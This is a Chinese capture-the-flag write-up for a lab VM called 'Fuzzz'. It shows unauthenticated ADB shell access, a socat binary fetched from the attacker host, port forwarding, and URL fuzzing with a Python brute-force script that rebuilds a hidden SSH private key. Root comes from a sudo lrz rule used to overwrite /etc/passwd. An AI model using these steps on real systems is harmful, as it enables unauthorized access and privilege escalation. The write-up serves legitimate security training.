Fuzzz

靶机信息

靶机名: Fuzzz

难度: Low-Easy

信息收集

root@kali:~# arp-scan --localnet -I eth0
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d8:ab:ac, IPv4: 192.168.100.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1    bc:24:11:b4:12:2d    (Unknown)
192.168.100.2    bc:24:11:a2:5b:a7    (Unknown)
192.168.100.3    00:e0:4f:25:79:40    Cisco Systems, Inc
192.168.100.10    90:09:d0:24:84:21    Synology Incorporated
192.168.100.11    c8:98:28:3e:45:5b    (Unknown)
192.168.100.12    c8:98:28:3e:49:9d    (Unknown)
192.168.100.50    08:00:27:90:b8:90    PCS Systemtechnik GmbH
192.168.100.53    98:8f:e0:6b:01:94    Huaqin Technology Co.,Ltd.
192.168.100.53    98:8f:e0:6b:01:94    Huaqin Technology Co.,Ltd. (DUP: 2)
192.168.100.51    54:48:e6:cb:25:c9    Beijing Xiaomi Mobile Software Co., Ltd
root@kali:~# nmap 192.168.100.50 -p- -sC -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-19 03:29 EDT
Nmap scan report for 192.168.100.50
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey:
|   256 b6:7b:e7:e5:b3:33:c7:ff:db:63:5d:b3:75:0d:e2:dd (ECDSA)
|_  256 0a:ce:e5:c3:de:50:9c:6d:b7:0d:de:73:b8:6c:28:55 (ED25519)
5555/tcp open  adb     Android Debug Bridge (token auth required)
MAC Address: 08:00:27:90:B8:90 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.62 seconds

Web

5555 是 adb

> adb connect 192.168.100.50:5555
connected to 192.168.100.50:5555
> adb devices
List of devices attached
192.168.100.50:5555    device
``
> adb shell
/ $ id
uid=1000(runner) gid=1000(runner) groups=1000(runner)
/opt $ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:80            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5555            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 :::22                   :::*                    LISTEN

进入 shell后, 发现了一个 80 ,使用 socat 转发出来

/tmp $ wget 192.168.100.100:8000/socat
Connecting to 192.168.100.100:8000 (192.168.100.100:8000)
saving to 'socat'
socat                100% |********************************|  366k  0:00:00 ETA
'socat' saved
/tmp $ chmod +x socat
/tmp $ ./socat TCP-LISTEN:4444,fork TCP4:127.0.0.1:80 &

image-20250519153807900
image-20250519153807900

访问后发现网页中有很多内容

root@kali:~# gobuster dir -x php,html,js,txt -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.50:4444
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.50:4444
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,js,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/line                 (Status: 200) [Size: 0]
/line2                (Status: 200) [Size: 0]
/line1                (Status: 200) [Size: 0]

root@kali:~# curl 192.168.100.50:4444/line
root@kali:~#

访问后,还是很有很多内容

root@kali:~# gobuster dir -x php,html,js,txt -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.50:4444/line
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.50:4444/line
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,js,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/b                    (Status: 200) [Size: 0]
/b3                   (Status: 200) [Size: 0]

仍然有很多内容,看到后我都傻逼了,靶机名字叫 fuzz,然后我就去 fuzz 了

root@kali:~# wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://192.168.100.50:4444/line/b3FUZZ --hc 404
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.100.50:4444/line/b3FUZZ
Total requests: 4744

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000210:   200        0 L      0 W        0 Ch        "B"

Total time: 0
Processed Requests: 4744
Filtered Requests: 4743
Requests/sec.: 0

拼起来是 b3B

我猜测这可能是私钥的前三个字母, 那么就可以编写脚本了

import requests
from urllib.parse import quote
import os

base_url = "http://192.168.100.50:4444"
initial_path = "/line1/"
session = requests.Session()
session.timeout = 3  # 3秒超时
max_line_number = 10  # 最大line编号
output_dir = "scan_results"  # 结果保存目录

# 创建输出目录
os.makedirs(output_dir, exist_ok=True)

# Base64字符集(字母数字 + '+' + '/' + '=')
base64_chars = (
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "0123456789"
    "+/="
)

def save_result(line_num, path):
    """保存有效路径到对应line的文件"""
    filename = os.path.join(output_dir, f"line_{line_num}.txt")
    with open(filename, 'a') as f:
        f.write(f"{base_url}{path}\n")



def brute_force_url(prefix_path, current_line):
    found_chars = []
    for char in base64_chars:
        # 对字符进行URL编码('/' -> '%2F',其他字符保持不变)
        encoded_char = quote(char, safe='') if char == '/' else char
        url = f"{base_url}{prefix_path}{encoded_char}"
        try:
            response = session.get(url)
            if response.status_code == 200:
                print(f"[+] Found valid char: '{char}' (encoded: '{encoded_char}') | URL: {url}")
                found_chars.append(char)
                save_result(current_line, f"{prefix_path}{encoded_char}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error on {url}: {e}")
    return found_chars

def recursive_brute_force(prefix_path, current_line):
    found_chars = brute_force_url(prefix_path, current_line)
    if not found_chars:
        print(f"[!] No valid chars found for {prefix_path}")
        return
    for char in found_chars:
        new_path = f"{prefix_path}{char}"
        print(f"[*] Recursing into: {new_path}")
        recursive_brute_force(new_path, current_line)

# 第一阶段:从根路径 /line/ 开始爆破
print(f"[*] Starting brute force on {base_url}{initial_path}")
recursive_brute_force(initial_path, 1)  # line 1

# 第二阶段:从 /line/2/ 到 /line/30/
for line_num in range(2, max_line_number + 1):
    initial_path = f"/line{line_num}/"
    print(f"[*] Switching to path: {initial_path}")
    recursive_brute_force(initial_path, line_num)

print(f"[*] All scans completed. Results saved to {output_dir}/")

ai写的人机代码, 保存后需要自己处理一下

root@kali:~/scan_results# ls -al
总计 40
drwxr-xr-x  2 root root 4096  5月19日 03:46 .
drwx------ 13 root root 4096  5月19日 03:45 ..
-rw-r--r--  1 root root 4865  5月19日 03:46 line_1.txt
-rw-r--r--  1 root root 4658  5月19日 03:46 line_2.txt
-rw-r--r--  1 root root 4865  5月19日 03:46 line_3.txt
-rw-r--r--  1 root root 2331  5月19日 03:46 line_4.txt
-rw-r--r--  1 root root 2486  5月19日 03:47 line_5.txt
root@kali:~/scan_results# for file in line_*.txt; do tail -n 1 "$file"; done > all.txt
root@kali:~/scan_results# cat all.txt
http://192.168.100.50:4444/line1/b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
http://192.168.100.50:4444/line2/QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
http://192.168.100.50:4444/line3/XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
http://192.168.100.50:4444/line4/AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
http://192.168.100.50:4444/line5/5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
root@kali:~/scan_results# sed 's|http://192.168.100.50:4444/line[0-9]*/||' all.txt > id
root@kali:~/scan_results# cat id
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
root@kali:~/scan_results#
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
-----END OPENSSH PRIVATE KEY-----
UserFlag
fuzzz:~$ cat user.flag
flag{da39a3ee5e6b4b0d3255bfef95601890afd80709}

提权 Root

fuzzz:~$ sudo -l
Matching Defaults entries for asahi on fuzzz:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asahi:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User asahi may run the following commands on fuzzz:
    (ALL) NOPASSWD: /usr/local/bin/lrz

lrz 是文件传输工具

fuzzz:~$ cd /etc/                                                                                              
fuzzz:/etc$ sudo /usr/local/bin/lrz -y

在本机写一个 passwd 文件上传到/etc/覆盖原来的 passwd

image-20250519155453458
image-20250519155453458

fuzzz:/etc$ cat passwd
root:$1$OW793DB3$k/E4oi0ePHb8PXxhCEBIt1:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
klogd:x:100:101:klogd:/dev/null:/sbin/nologin
runner:x:1000:1000::/home/runner:/bin/sh
asahi:x:1001:1001::/home/asahi:/bin/sh
uwsgi:x:101:102:uwsgi:/dev/null:/sbin/nologin

给 root 设置一个密码

fuzzz:/etc$ su
Password: 123
/etc # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
RootFlag
~ # cat root.flag 
flag{46a0e055d5db8d82eee6e7eb3ee3ccf64be3fca2}